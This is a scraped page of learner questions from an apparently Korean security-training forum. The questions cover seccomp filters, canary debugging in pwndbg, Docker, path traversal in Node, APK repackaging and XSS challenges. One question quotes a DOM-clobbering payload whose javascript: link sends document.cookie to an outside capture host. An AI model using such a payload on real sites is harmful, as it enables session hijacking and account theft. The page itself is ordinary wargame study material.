Waiting answers
密码学

密码学从哪开始学

2022.09.02. 15:35

ALLOW 리스트 / DENY 리스트

Exploit Tech: Bypass SECCOMP 강의에서 3. 코드분석 Figure 1에 나온 sandbox 함수가 ALLOW 리스트 기반이라고 하고 있는데, SCMPACTALLOW를 써서 모든 시스템 콜을 허용한 뒤, seccompruleadd로 세 번째 인자로 전달된 시스템 콜의 호출을 거부하도록 추가하고 있으니, 거부할 시스템 콜의 리스트인 DENY 리스트 아닌가요? !image.png !image.png

$fs_base+0x28 디버깅 관련

강의에서 처럼 마스터 카나리의 주소를 알기위해 디버깅을 하여 x/x $fs_base+0x28 이렇게 하였는데 Argument to arithmetic operation not a number or boolean. 와 같은 오류가 뜹니다 어떻게 해야하나요?? pwndbg> x/x $rbp-110 0x7ffff77eeee2: 0x00000000 pwndbg> x/x $fs_base+0x28 Argument to arithmetic operation not a number or boolean. pwndbg> p $fs_base+0x28 Argument to arithmetic operation not a number or boolean. pwndbg> p /x (int )($fs_base+0x28) Argument to arithmetic operation not a number or boolean. pwndbg> x/w $fs_base+0x28 Argument to arithmetic operation not a number or boolean.

우분투 22.04 CUI 콘솔 환경에서 스크롤 올리고 내리는 거

옛날엔 Ctrl + Alt + PageUp을 누르면 스크롤이 올라가고 Ctrl + Alt + PageDown을 누르면 스크롤이 내려갔는데 최신 리눅스 운영체제에선 이 단축키가 안 먹힙니다. 터미널말고 Ctrl + Alt + F3을 누르면 완전히 콘솔로 바뀌는 환경에서 스크롤을 올리고 내리는 걸 여쭤봅니다. 우분투 22.04 CUI 콘솔 환경에서 스크롤 올리고 내리는거 어떻게 합니까? p.s. Shift + PageUp or Down 도 안 먹힙니다.

2022.09.11. 07:16

버퍼와 캐시 그리고 레지스터

cpu구조에 캐시와 레지스터가 있는데 버퍼와 비슷한 역할을 하는걸로 알고있는데 혹시 그럼 캐시와 레지스터에도 오버플로우가 발생하나요?

2022.09.14. 17:32

node 에서 path.parse 썻을 때 bypass 가능 여부

안녕하세요 express로 개발된 환경에서 file download 기능을 구현했습니다. 해당 부분에서 path.parse를 이용해서 필터링을 거쳤는데 path.parse의 해당 부분에서 bypass가 가능한지 궁금합니다. ` const ext = path.parse(f_originalname).ext; ` ` const filename = path.parse(f_originalname).name + ext; ` 위 코드를 통해서 path traversal 취약점을 막았는데 path.parse 부분을 bypass 해서 path traversal 취약점이 나올 수 있을까요?

2022.09.16. 15:55

docker 관련 질문

c언어로 인자 (argc, argv)가 필요한 프로그램을 만들어서 docker 컨테이너를 빌드하는 과정에서 컨테이너를 실행해보는데 아무일도 안 일어납니다... docker run test2:1.0 아무것도 없음 docker run test2:1.0 인자넣으면될것같아서넣음 "asdf": executable file not found in $PATH 어떻게 해야 하나요...

2022.09.17. 22:48

Dom Clobbering 이용한 문제 풀이 질문 드립니다.

<a id="path" name="redirectUrl" href="javascript:location.href='https://hswezwq.request.dreamhack.gamess/cookie='+document.cookie;"></a><a id="path"></a> 위와 같은 코드를 제출 하였는데 안되는 이유를 좀 알 수 있을까요? 너무 막막하네요...

2022.09.20. 01:45

리패키징 질문입니다.

수정해야될 부분을 수정하고, signapk을 활용하여 서명 적용 후 애뮬레이터에 설치를 진행하면 아래 오류가 출력됩니다. [INSTALLFAILEDNOMATCHINGABIS: Failed to extract native libraries, res=-113] 제가 사용하는 java 버전에서는 BASE64Encoder 클래스가 제거되었다고 해서 버전도 8버전으로 낮춘 뒤 서명을 진행했습니다. signapk 말고keytool, jarsigner 을 사용해도 똑같은 오류가 출력됩니다. 애뮬레이터 OS 버전을 낮춰보니 아래 오류도 뜨네요. [installfailedinvalidapk scanning failed..: Package /data/app/WfS4FzAFdbGbhEggfmSp-g==/com.namdaehyeon.findkey1-- MXdcTxh_UHwPZHMKLeGw==/base.apk code is missing]

2022.09.20. 17:47

태그 및 이벤트 핸들러 질문입니다.

vuln 페이지에서 동작하는 HTML 태그 및 이벤트 핸들러를 찾았습니다. 다만, flag 페이지에서 입력 시 flag 값을 획득할 순 없었습니다. 여러가지 경우의 수를 찾아본 결과 특정 태그 및 이벤트 핸들러에서만 flag 값을 획득 할 수 있는게 맞는 형태일까요?

2022.09.22. 17:19

There are 33 Courses.
1/9 page

Background: Computer Architecture

Tool: Environment Setup⚙️

Tool: QEMU